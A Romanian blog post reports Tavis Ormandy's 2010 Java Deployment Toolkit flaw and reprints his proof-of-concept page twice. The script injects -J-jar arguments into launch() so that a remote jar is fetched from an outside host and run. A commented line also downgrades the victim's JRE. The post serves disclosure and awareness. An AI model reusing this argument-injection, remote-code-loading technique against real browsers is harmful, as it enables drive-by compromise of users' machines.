Vulnerabilitate Sun Java

Asa cum si in internet explorer au fost si vor mai fi de acum incolo vulnerabilitati, iata ca de data aceasta a venit si randul celor de la Sun – Java.

Tavis Ormandy (Google) a descoperit o vulnerabilitate in java (pe care mai toata lumea o are instalata in calculator) prin care accesarea unei  anumite pagini special creata se pot rula pe calculatorul victimei diverse aplicatii periculoase.

Aceasta fulnerabilitate afecteaza toate versinile de Java incepand cu Java 6 update 10 si pana in prezent. De asemenea aceasta vulnerabilitate permite rularea de cod malitios in Internet Explorer 8 si testat de mine in Google Chrome versiunea 4.1.249.1045.

Asa cum reiese si aici se pare ca Mozilla FireFox ca este imuna la aceasta vulnerabilitate. De asemenea si Windows 7 cu Internet Explorer 8 instalat vulnerabilitatea da eroare doar daca UAC-ul este pornit, asa ca acesti utilizatori sunt protejati chiar daca inca nu s-a raportat nici o exploatare a acestei vulnerabilitati.

O parte buna a acestei vulnerabilitati este ca daca utilizatorul ruleaza pe un user cu drepturi limitate, atunci si codul malitios o sa ruleze cu aceleasi drepturi.

Pentru a va testa browserul daca acesta este vulnerabil sau nu atunci mergeti pe aceasta pagina. Codul sursa de la aceasta vulnerabilitate (demo) il puteti vizualiza mai jos:


<html>

<head><title>Java Deployment Toolkit Test Page</title></head>
<body>
<script>
// Tavis Ormandy <taviso@sdf.lonestar.org>, April 2010
var u = “http: -J-jar -J\\\\lock.cmpxchg8b.com\\calc.jar none”;
if (window.navigator.appName == “Microsoft Internet Explorer”) {
var o = document.createElement(“OBJECT”);
o.classid = “clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA”;
// Trigger the bug
o.launch(u);
} else {
// Mozilla
var o = document.createElement(“OBJECT”);
var n = document.createElement(“OBJECT”);
o.type = “application/npruntime-scriptable-plugin;deploymenttoolkit”;
n.type = “application/java-deployment-toolkit”;
document.body.appendChild(o);
document.body.appendChild(n);
// Test both MIME types
try {
// Old type
o.launch(u);
} catch (e) {
// New type
n.launch(u);
}
}
// Bonus Vulnerability, why not downgrade victim to a JRE vulnerable to
// this classic exploit?
// http://sunsolve.sun.com/search/document.do?assetkey=1-66-244991-1
// o.installJRE(“1.4.2_18”);
</script>
</body>
</html>

<html><head><title>Java Deployment Toolkit Test Page</title></head><body>    <script>        // Tavis Ormandy <taviso@sdf.lonestar.org>, April 2010         var u = “http: -J-jar -J\\\\lock.cmpxchg8b.com\\calc.jar none”;         if (window.navigator.appName == “Microsoft Internet Explorer”) {            var o = document.createElement(“OBJECT”);             o.classid = “clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA”;             // Trigger the bug            o.launch(u);        } else {            // Mozilla            var o = document.createElement(“OBJECT”);            var n = document.createElement(“OBJECT”);             o.type = “application/npruntime-scriptable-plugin;deploymenttoolkit”;            n.type = “application/java-deployment-toolkit”;            document.body.appendChild(o);            document.body.appendChild(n);             // Test both MIME types            try {                // Old type                o.launch(u);            } catch (e) {                // New type                n.launch(u);            }        }         // Bonus Vulnerability, why not downgrade victim to a JRE vulnerable to        // this classic exploit?        // http://sunsolve.sun.com/search/document.do?assetkey=1-66-244991-1         // o.installJRE(“1.4.2_18”);    </script></body></html>

  1. […] Vulnerabilitate de care va povesteam cu cateva zile inainte ce permitea rularea de cod malitios prin accesarea unei pagini de internet special conceputa a fost remediata. […]

Lasa un comentariu

Contact Link-exchange Windows tools and scripts
Powered by WordPress | Designed by: Themes Gallery | Thanks to wordpress 4 themes, Download Premium WordPress Themes and